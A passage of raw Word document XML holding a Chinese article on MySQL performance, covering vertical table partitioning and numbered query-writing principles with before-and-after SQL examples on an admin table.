          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>垂直分割</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>垂直分割</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是一种把数据库中的表按列变成几张表的方法，这样可以降低表的复杂度和字段</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>的数目，从而达到优化的目的。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>以前，在银行做过项目，见过一张表有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>多个字段，很恐怖</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>示例一：在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>表中有一个字段是家庭地址，这个字段是可选字段，相比起，而且你在数据库操作的时候除了个人信息外，你并不需要经常读取或是改写这个字段。那么，为什么不把他放到另外一张表中呢</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这样会让你的表有更好</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D63189" w:rsidRPr="00D63189" w:rsidRDefault="00D63189" w:rsidP="00D63189">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>一、前提</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D63189" w:rsidRPr="00D63189" w:rsidRDefault="00D63189" w:rsidP="00D63189">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>这里的原则只是针对</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>数据库，其他的数据库某些是殊途同归，某些还是存在差异。我总结的也是</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>普遍的规则，对于某些特殊情况得特殊对待。在构造</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>语句的时候要养成良好的习惯。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D63189" w:rsidRPr="00D63189" w:rsidRDefault="00D63189" w:rsidP="00D63189">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>二、原则总结</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D63189" w:rsidRPr="00D63189" w:rsidRDefault="00D63189" w:rsidP="00D63189">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>原则</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>、仅列出需要查询的字段，这对速度不会明显的影响，主要是考虑节省应用程序服务器的内存。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D63189" w:rsidRPr="00D63189" w:rsidRDefault="00D63189" w:rsidP="00D63189">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>原来语句：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> select * from admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D63189" w:rsidRPr="00D63189" w:rsidRDefault="00D63189" w:rsidP="00D63189">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>优化为：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> select admin_id,admin_name,admin_password from admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D63189" w:rsidRPr="00D63189" w:rsidRDefault="00D63189" w:rsidP="00D63189">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>原则</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>、尽量避免在列上做运算，这样导致索引失效。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D63189" w:rsidRPr="00D63189" w:rsidRDefault="00D63189" w:rsidP="00D63189">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>原语句：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> select * from admin where year(admin_time)&gt;2014</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D63189" w:rsidRPr="00D63189" w:rsidRDefault="00D63189" w:rsidP="00D63189">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>优化为：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> select * from admin where admin_time&gt; '2014-01-01′</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D63189" w:rsidRPr="00D63189" w:rsidRDefault="00D63189" w:rsidP="00D63189">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>原则</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>、使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">JOIN </w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>时候，应该用小的结果驱动大的结果（</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">left join </w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>左边表结果尽量小</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>如果有条件应该放到左边先处理，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">right join </w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>同理反向），同事尽量把牵涉到多表联合的查询拆分多个</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>query</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>（多个连表查询效率低，容易到之后锁表和阻塞）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D63189" w:rsidRPr="00D63189" w:rsidRDefault="00D63189" w:rsidP="00D63189">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>原来语句</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> select * from admin left join log on admin.admin_id = log.admin_id where log.admin_id&gt;10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D63189" w:rsidRPr="00D63189" w:rsidRDefault="00D63189" w:rsidP="00D63189">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>优化为：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> select * from (select * from admin where admin_id&gt;10) T1 lef join log on T1.admin_id = log.admin_id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D63189" w:rsidRPr="00D63189" w:rsidRDefault="00D63189" w:rsidP="00D63189">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>原则</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>、注意</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">LIKE </w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>模糊查询的使用，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>避免使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
